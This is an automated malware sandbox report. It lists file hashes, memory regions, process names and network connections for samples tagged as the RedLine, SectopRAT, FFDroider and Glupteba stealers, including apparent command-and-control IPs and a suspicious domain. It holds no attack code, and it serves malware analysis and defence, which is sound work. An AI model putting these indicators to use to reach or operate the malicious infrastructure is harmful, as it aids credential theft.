| SHA256 | e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb |
| SHA512 | a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a |
C:\Users\Admin\AppData\Local\Temp\HFI4189.tmp.html
| MD5 | 98f82c25e390521fbdac13f348eee2ce |
| SHA1 | 27973e4b1d640473f2484e84e9bb7782d1e7a7f3 |
| SHA256 | b4dc7a52d459568e7507f71fde2be01a19b9fa38a1e61e4038e9f9971874859e |
| SHA512 | 9f5d869261eb2b76c0e10dd6bd4e249dad8943c855ccdba59904761d3e54fe696dad64e395f8cfdade7a0e10b926ed477764a9b9aeeec20065be862ea8aaa403 |
memory/4100-292-0x00000000085B0000-0x00000000085B8000-memory.dmp
memory/4100-293-0x0000000008630000-0x0000000008668000-memory.dmp
memory/4100-294-0x0000000008610000-0x000000000861E000-memory.dmp
C:\9005a0d50ef6d68969\ParameterInfo.xml
| MD5 | 3ac6a8f0fe4aa7fb0ffe21b548abacbb |
| SHA1 | 5e30d7d1057a9e8a8732ad67d672ca7a608657ef |
| SHA256 | 68d6fcfd5f2986206763e1b49b86997c94a51260e4f9c02b8037aa5cf3c03142 |
| SHA512 | e5bff3554f4dd149e7b1bc3f5eae5d234a7e22e69f3e0d210a67511cf85bb9ce4c3a787a91af89b9d5f2ec91be62719312921716baf29d1f81571b8b2a6e6834 |
C:\9005a0d50ef6d68969\UiInfo.xml
| MD5 | c99059acb88a8b651d7ab25e4047a52d |
| SHA1 | 45114125699fa472d54bc4c45c881667c117e5d4 |
| SHA256 | b879f9bc5b79349fa7b0bdbe63167be399c5278454c96773885bd70fbfe7c81d |
| SHA512 | b23a7051f94d72d5a1a0914107e5c2be46c0ddee7ca510167065b55e2d1cb25f81927467370700b1cc7449348d152e9562566de501f3ea5673a2072248572e3b |
C:\9005a0d50ef6d68969\1033\LocalizedData.xml
| MD5 | f68f5e6d0ab12908f1d6451ea4b16d61 |
| SHA1 | f51ef1ccb08cfdab32c0ceacf5369c353eb036d5 |
| SHA256 | 65471fdc2a95dd77759ad629bc57db6f4caf039d43d4e756053c30a7d5ff03c9 |
| SHA512 | 7a64114083903522d319237063d05b619fdc3d4ce9945dd3124773b9f6a57b848007b77f55bcba5f29001c9f4d02ee68f35440c37e8326e96559bae485c0b4c3 |
C:\9005a0d50ef6d68969\1025\LocalizedData.xml
| MD5 | bd97655af30131b0d8387bab5f20e68d |
| SHA1 | cb42103aea4de739573dacf49ebb527b00dc3e55 |
| SHA256 | bfca8cdb158986f6a333ece89daa3081a6a81f89ea868a697113a19121c14f7e |
| SHA512 | c365faed844bb2d750acea77b308df2a9a8b94e2270ce2b75d17b4356262d0d65a4489bc55705a45c4b1bc28bd0cc2b2c1e167a43d3c7321f3e758f128ea7651 |
C:\9005a0d50ef6d68969\1028\LocalizedData.xml
| MD5 | 5727d5160e0fb5d661eb4e6720430d1b |
| SHA1 | b3b6ba3fda17ca68a20675ae06b3c56d576274b4 |
| SHA256 | 0ad12bf18aa4fcc557ab9422ebef07ab0b8369395bcf695f0915ea99c689f99f |
| SHA512 | 7f0314a621137e4076f4ea22e82a6845912fae3b002ba4455952c683e6be89e5a3de4a7cd8f4df2a360247923ca472a53619a2d3635cdcfc1c66e03e7aac2a31 |
C:\9005a0d50ef6d68969\1029\LocalizedData.xml
| MD5 | eae0498ea94f2a7e7982ee773d10d3a5 |
| SHA1 | f0bc4a900f0eefd362760b77b7cc1829ac0bb93e |
| SHA256 | 309dac84e7aef6b4cca2cd7b1eeef8a30bd910373724ca56e8764fa3b420aa79 |
| SHA512 | 978b97cb7c8274ed73063c1f9a9bce4d9c0fd9c186de67d2ce3b03d33dd88487b6f480eea481fe9c3687c3008a5403b85a16ba57072ac03baee1ffe1c14fb6e7 |
C:\9005a0d50ef6d68969\1030\LocalizedData.xml
| MD5 | c805fa6fd2e634ecd0083074194b3899 |
| SHA1 | 079f0dc73703b987447cf3ddc1e4761047aeb605 |
| SHA256 | 2b563a3837a23214d290f11b6acb6836ed065bc17c8965108b385ea3ac91922f |
| SHA512 | ff5e3813a4769e6962c363dc64f251724df98be94b195c805cb8854717d3e633fa2c9ae160c55ee6e3872699e692a6ff8b58d2b8de36579f30edcf324c798e8f |
C:\9005a0d50ef6d68969\1031\LocalizedData.xml
| MD5 | 4ce791c97f9a6abae6de28487cbdf24c |
| SHA1 | cb85c4b052eae862a55d0b8bf8f2c57e3412c0a0 |
| SHA256 | 8e878d95152714e1b77c1c7cb8538501c732e06615bb614d3cd71d0b147beaa4 |
| SHA512 | 4333de904e66d1ff795d8905a21b8c06830635de4bc25ecd3eb94aef7923937b67d5ff464b2e92249a3c5d61bf19ebae7868c9f5435544bd5c3e80fa925e7e4e |
C:\9005a0d50ef6d68969\1032\LocalizedData.xml
| MD5 | b15beae6eebd44f084681316217c35fd |
| SHA1 | ff93f038e65b85a68b4887f88eb792db1d6fc1ce |
| SHA256 | c00d4950f2497d3de235b7d82a8bb737d17eb789551b2fbe8be822ac59d7db8b |
| SHA512 | 9af03bb58e5d6bf1a62c4fd1e86c4809b97b0f10929c6b7bdd5048afd29c8b21755ed73587dc4380dbd0a8302a9873bd0540553feff40a01fa8196a89c074b36 |
C:\9005a0d50ef6d68969\1035\LocalizedData.xml
| MD5 | cdfc12ff066fef57a60e13a61e2fe9f7 |
| SHA1 | c412a703fbc4c436d6f40129dd793ff94188e0ab |
| SHA256 | b9176ebcf72da0b18850a2d23eb90962c90e2c819b0aa2fb4d32b71ae387b82c |
| SHA512 | 0bea735854f1148ed044afae2f1da5dd0c8f5b9f3d758371b85656fd4bb98a77e6b495ec95797ec36b36f1029aa4f434c1a8ea1541ca738b8e634999b69ea9d0 |
C:\9005a0d50ef6d68969\1037\LocalizedData.xml
| MD5 | 52529d623cbe2229e179178037852000 |
| SHA1 | cdf681bcd3090d7ded20878a7e8759465f429c91 |
| SHA256 | 2f0078da6c7d15c770d517030dc0d96d540a67a501cd54430637ffb77c23fb44 |
| SHA512 | 6c4a05fb4e0f15ff297bd1371d0e33e020376b4f85b3bc4faedf92e9521deb2e47b55d1a4aacbc68b76ea6602a4f14d354a51098c8143cb2e5a6db77d97bab4e |
C:\9005a0d50ef6d68969\1036\LocalizedData.xml
| MD5 | 8122a6977d478cd6c93ac26998f38f91 |
| SHA1 | 9a49baefafd4918ea5a538366d4091d2a867e4d9 |
| SHA256 | 15454de5eb80f0b2bbec3e9855d1841b1ae7c95d38f838ba525cdc8b0270c7c7 |
| SHA512 | 4ee048f39fb80f4e52dc80384c4566ab65d1aae3d52078d76d6fa63b1761625ba02bf5238532aaebf23c8b46c19448bbbdd9d885d22afe3b92b094a0bd6ea4b7 |
C:\9005a0d50ef6d68969\1038\LocalizedData.xml
| MD5 | 17e14f770796e2b7458f1fdb9511da1a |
| SHA1 | c72c4ae5455e9851b6e5f2aabf1f3d78920258d8 |
| SHA256 | f73b516104eb7651bb66889799d771c44b8c6bfda501237f3325b6f2133c0af7 |
| SHA512 | dac5d1536ddf76d485b1512c4e1fc7d13e21ebd79f112f1cb53bd6d59395cfee9b6cc5afcb26f3bea0c7b190bdc6b19c49fedaadae89e92cf904c22b52fdb4fc |
C:\9005a0d50ef6d68969\1040\LocalizedData.xml
| MD5 | 2dd0b542600eddd67f44d35492e5d526 |
| SHA1 | 8199817fd80d39d5536a6b21d7ee108c16792f81 |
| SHA256 | 9fde0a246757fdcbd435abf67d10168b1875c9b1a85d51bb821cb7494e3f79d1 |
| SHA512 | d76a7fdecdd9ecd70601fec0765e97a1a42315edce8a483b7b22007e5b4de00ff84e09e1cb50a2127ce64b8de92ca38bb8f1acea707061d95c120c194a2cb187 |
C:\9005a0d50ef6d68969\1041\LocalizedData.xml
| MD5 | 05ae74494480b60daa65cbd7d33e8ff3 |
| SHA1 | a54c87632654368909c2e9801f10a76ac864ca28 |
| SHA256 | a69cc0439bf7e72a59ac4c2b0f6d80cc8822165421a824bb234924de3e5d69e1 |
| SHA512 | 16292e5ff02087380ff0b64b3c129af689a050d9562aba0ea9d71e692505d50ffefefd08eaca36f370b86a0f01309ea577336a89d5d5f7f9ea573098bb2f228c |
C:\9005a0d50ef6d68969\1042\LocalizedData.xml
| MD5 | 5659c33354875ffe975534d8b4c29675 |
| SHA1 | 5cf25ba5da9d8c6fd6a6b7ba67bd02c663f48b21 |
| SHA256 | 92d7923380007234dfed0329779621909bea28bc837c1975ac141ce872caae55 |
| SHA512 | 38fafc1d3886d8cddff362d690c776280d6b586521c9f7991ff60d6403940820ae44d987f76ffea5f33899e12dcef07d6e12ec8b54245d5523f9a9f9f2adcb20 |
C:\9005a0d50ef6d68969\1043\LocalizedData.xml
| MD5 | 9841af88c8432f1c28c390205fa25cdf |
| SHA1 | 7eff1df19b35080442254f0962e8337038b53024 |
| SHA256 | 794c11a6abe5a9348cedf44a5421ef20e9de00e7cd34dc80e9d5a80538e45666 |
| SHA512 | 3ddbfa7f7a3165144ffe6a772bb78d0659db60d71ac4d250ac3ff2a416396123ff9377c928012b5e84e7571ccbe52e132d6f3ad22fa5185878923c48995270ee |
C:\9005a0d50ef6d68969\1044\LocalizedData.xml
| MD5 | be070a2a425774e4016376a7c5efc46e |
| SHA1 | 56ccfcca60b97ce227436f72bd56969d4b770557 |
| SHA256 | 3a9354ac2acaf1671844a4d1c8f0e7c5c86ef183cb30dda4eef5bac02de6b2a7 |
| SHA512 | 4c0045629f9a9a7d8a84b79303550a26fa8cad308b78656acfe579fc1c1f6dd5fd6d10c23fb87142406117357a1cb2ffe6364025233b70bf776ef0b696f31616 |
C:\9005a0d50ef6d68969\1045\LocalizedData.xml
| MD5 | 603d2406053837c960df9a66e3af052d |
| SHA1 | 7afb11ea418cba19fa1b25d112c7acd110bfc638 |
| SHA256 | e2383afcb0c44bab237003b4a8c3dac2bdccada9f42c82ea2004aa04db901edd |
| SHA512 | 97d598473cbd9c3b66bbfc8c1f4ba47701bc66a9581262a75f6b4af5d469ff19b134ebd3d6108af3df1f9bee82f8f5f0ba864abb769dbb23677bc427a1247ea3 |
C:\9005a0d50ef6d68969\1046\LocalizedData.xml
| MD5 | af1f0f47f381c11a9c4296fcdca0ebbd |
| SHA1 | 838f581e6aa7596381d25784d8ca30a48c47eb9e |
| SHA256 | 00601e4ff88a8d6f0dcbf65fbbf14142cd86fdc7cb8f251893f70b597ef3a7eb |
| SHA512 | 8d326bdb639a797dc5e253936f7b39981f5bdeb112fd46a5d0596d6476ad17e790b43b1b2dce91bf33f27940cc32afa57e535c3f38e93cd30f27d4843a49d9eb |
C:\9005a0d50ef6d68969\1049\LocalizedData.xml
| MD5 | d6f7e810eeaec18464d0ebf0e0589eb6 |
| SHA1 | 962a25926f8196448821c4b21d5619d42cf3ae6d |
| SHA256 | c43af2be229fa08f1d7f161ff9dd4dfd25a459a05ec8462c3b683ab7bd0cc4f8 |
| SHA512 | b78f9f98a9993478c2107eb738f1949d031f12ffbc78e7a4cfa67ff7dbefe5e456712eb6e23eebaaadb6a5645ff25600432e1c5e32f1e4493d090d9b8674bed3 |
C:\9005a0d50ef6d68969\1053\LocalizedData.xml
| MD5 | 653ff0be9c7132b411bb95d7d6b90d78 |
| SHA1 | fd57ee34dd102fe6b8b709bf46829f7b1c0a7c42 |
| SHA256 | 3c4c96b9ed7f536cbcc698760b7142db8411d6ba4ad784a29727bac2e7df7d9a |
| SHA512 | 77ed725595a50492d80ac2c593b25f30ec61a579348acef87e2f25484f2975abfeff946c04de6482be186864c3c9d42a673a3d4b679f19cbe34851d1c1496064 |
C:\9005a0d50ef6d68969\1055\LocalizedData.xml
| MD5 | bd0f034d3eff8d3a60f9acccadcfbf56 |
| SHA1 | c622870702e94cdf76979093440c22f9127e4b50 |
| SHA256 | d1896ac9b20686a00c7d0bf0f8dc8279b9a52f88025b8cc3b161100d224df7c9 |
| SHA512 | 3d6e93c1498381a5e8bb34969cec3596a5006abc5f1ad1b3bfb3298e763b64f45538be05693c1c70787135ec3af2e813bed45dfd174dcbc0db3b711550737d65 |
C:\9005a0d50ef6d68969\2052\LocalizedData.xml
| MD5 | 7497b47f7db96dff8e7c1198b7964006 |
| SHA1 | fc05395f849d386261b8bb7511893bbe6a4c5467 |
| SHA256 | f0b7e9242c27ea1652e9ea6d46b8617e189e31bf093e7e21e38e60d94cea16eb |
| SHA512 | b24f97e32de52ac4cee276c0d4b4089cdcea90ac309f135c3b2273de15badffbed02044aa8f429e52376159e1def2c43c87405fa2a206b4ac55d74040e20951a |
C:\9005a0d50ef6d68969\2070\LocalizedData.xml
| MD5 | 382abfa1307279a35a6a70f7de7046e3 |
| SHA1 | fabfd301d954d04a1565d23c2f093b1c0ce574c1 |
| SHA256 | 32a0606e178f5f77b7e13573a910b4fcb7587e9ff4823d3a95cc28dd73074ade |
| SHA512 | b5ada4a1abe2689173f169b5d16b05da34158e55e9ae0b0b77f2de9e47469bbae77c958bbe62d756a8fbd610b995d9be8bd6606d1230371f0c7f2ea89f291046 |
C:\9005a0d50ef6d68969\3082\LocalizedData.xml
| MD5 | 2bce3f6dd7abbe483ec92a688ef3b76e |
| SHA1 | 6a8adc8e3c481aa6e404239cd0ea419c0e98c262 |
| SHA256 | df8531355aa11a9a585b63a6fcc96c0c6c480e06a602d88a949bcac1ff7795bd |
| SHA512 | 0d03643ed072e5961f5ef5d1ebbd2cb0e730ea5e40c46892e7a83d11f47290f031564d3283fa24c587bf46df8f4e39abe92f38e6a42acded315b16c96d7e7e8d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
\??\pipe\LOCAL\crashpad_4804_NWNRZSDLFLWVWNBZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fc44ebecd7e78f0db012aa45a2331017 |
| SHA1 | 998ba4ef6f78b35a18f451d16ac21bb4f2f99f14 |
| SHA256 | 46a689089addc3c9fb7f6638f05039e9387ed531bb02c222988944152ada0d38 |
| SHA512 | eb980de019b39bf6f7becaef660d0fc3d195f20e8a51e1701e6422c21a6ef7e4743ca2e39a94e7464f18ebb208270d1ae5563a9588fcc580cff5dbb4ca6cbde1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 471a776f10ae823f1784586d40c5ff59 |
| SHA1 | 2c88b990e6568cca056115905d801d6d8096e7fc |
| SHA256 | 2b8873b0e06dd45ec3f6d28d219a349211f4928bb2c6b0943f512bb4fa8e1aea |
| SHA512 | 4e64d90d016bfea13d6c63b681106368b8d8ec2ebabbf30f6decf7b74c13135e2956269fa267a615a507cbba5a5b27a175b7190818befe7f860c2084f5ab1f96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 665669f69a21b573026de341f1481d65 |
| SHA1 | 5dfb87d32a3d04668de09e80d71243a5492fcd18 |
| SHA256 | d8dc23066bb5494f8b4b3c1e73506e015219736f43bd569fb5f06cad5c144b80 |
| SHA512 | 61a7334950161a8dbc8ac1c8421dae21ee7cf889a59de84df50447256d5d2ace69eef530520cf063186f5168204d19471b7d4cd5aa4504ff1f9f91f698a25726 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9ee7508922e70c1cc2be2f0f6bd65510 |
| SHA1 | 044fccc987a006b83bf3439514f2ea2971c0a817 |
| SHA256 | 0db431819be2e05d7d91cd8d5d27c9b7dd2ee1b5c8b362db39a6f21973ca480b |
| SHA512 | d37e1e50bc51cb586bc1752b0aab5b749ef2bc3c9d45a2fb23996bc345d41bae377a4d98a336fff3428760ace8a78e810f58feb3eb80bacb096c2a649852398f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9cb693ad72710e1f3dbe6402007e2aff |
| SHA1 | 631007dc10882c04b3991e0cdbd00c29a15d0540 |
| SHA256 | 396a27383e161d5802a4f625149d5c47549b7d616aefabc5d785aa407e6ba147 |
| SHA512 | 5813e5768be537fc8e472fbba96b4f70a05ce51269dacc761c25e7fe0c3e9a5f8d2c6b301215b02ddeeaf278513064d8467d43636ebc891c421063a918835573 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e6d75dfe9fadfcdf8ac666a50e6c5c05 |
| SHA1 | 6807b1f1fbe4ce984f323da227ff54842e60428d |
| SHA256 | ba84e40c5401dac15f65ee4c205d33447bced94e5371c40ec613c92ad2c33487 |
| SHA512 | 4b6caa48ec855c1e29f26bc0f33a53a9a9c1c1c99d936627a066f5865ffa258f306f46d8badfa0271d69f02e6e09dc43f024958e64fe8070fc627b66598b1980 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
90s
Max time network
140s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\jamesnew.exe
"C:\Users\Admin\AppData\Local\Temp\jamesnew.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bbaser2.webtm.ru | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
Files
memory/1724-0-0x0000000000400000-0x000000000062C000-memory.dmp
memory/1724-1-0x0000000000020000-0x0000000000023000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabBC5F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1724-19-0x0000000000400000-0x000000000062C000-memory.dmp
memory/1724-21-0x0000000000400000-0x000000000062C000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\redcloud.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\redcloud.exe
"C:\Users\Admin\AppData\Local\Temp\redcloud.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp |
Files
memory/4968-0-0x00000000750CE000-0x00000000750CF000-memory.dmp
memory/4968-1-0x0000000000B80000-0x0000000000BB0000-memory.dmp
memory/4968-2-0x0000000005BB0000-0x0000000006154000-memory.dmp
memory/4968-3-0x0000000006D30000-0x0000000007348000-memory.dmp
memory/4968-4-0x0000000005750000-0x00000000057E2000-memory.dmp
memory/4968-5-0x0000000005700000-0x0000000005712000-memory.dmp
memory/4968-6-0x0000000005900000-0x0000000005A0A000-memory.dmp
memory/4968-7-0x00000000058B0000-0x00000000058EC000-memory.dmp
memory/4968-8-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4968-9-0x00000000065E0000-0x000000000662C000-memory.dmp
memory/4968-10-0x00000000750CE000-0x00000000750CF000-memory.dmp
memory/4968-11-0x00000000750C0000-0x0000000075870000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\udptest.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/1100-3-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1100-2-0x0000000003AE0000-0x0000000003B10000-memory.dmp
memory/1100-1-0x0000000001DF0000-0x0000000001EF0000-memory.dmp
memory/1100-4-0x0000000003C20000-0x0000000003C44000-memory.dmp
memory/1100-5-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/1100-6-0x0000000006620000-0x0000000006BC4000-memory.dmp
memory/1100-7-0x0000000003E10000-0x0000000003E32000-memory.dmp
memory/1100-9-0x0000000006520000-0x0000000006532000-memory.dmp
memory/1100-8-0x0000000006BD0000-0x00000000071E8000-memory.dmp
memory/1100-10-0x00000000071F0000-0x00000000072FA000-memory.dmp
memory/1100-11-0x0000000006540000-0x000000000657C000-memory.dmp
memory/1100-12-0x00000000065C0000-0x000000000660C000-memory.dmp
memory/1100-14-0x0000000001DF0000-0x0000000001EF0000-memory.dmp
memory/1100-15-0x0000000003AE0000-0x0000000003B10000-memory.dmp
memory/1100-16-0x0000000000400000-0x0000000000433000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20241023-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
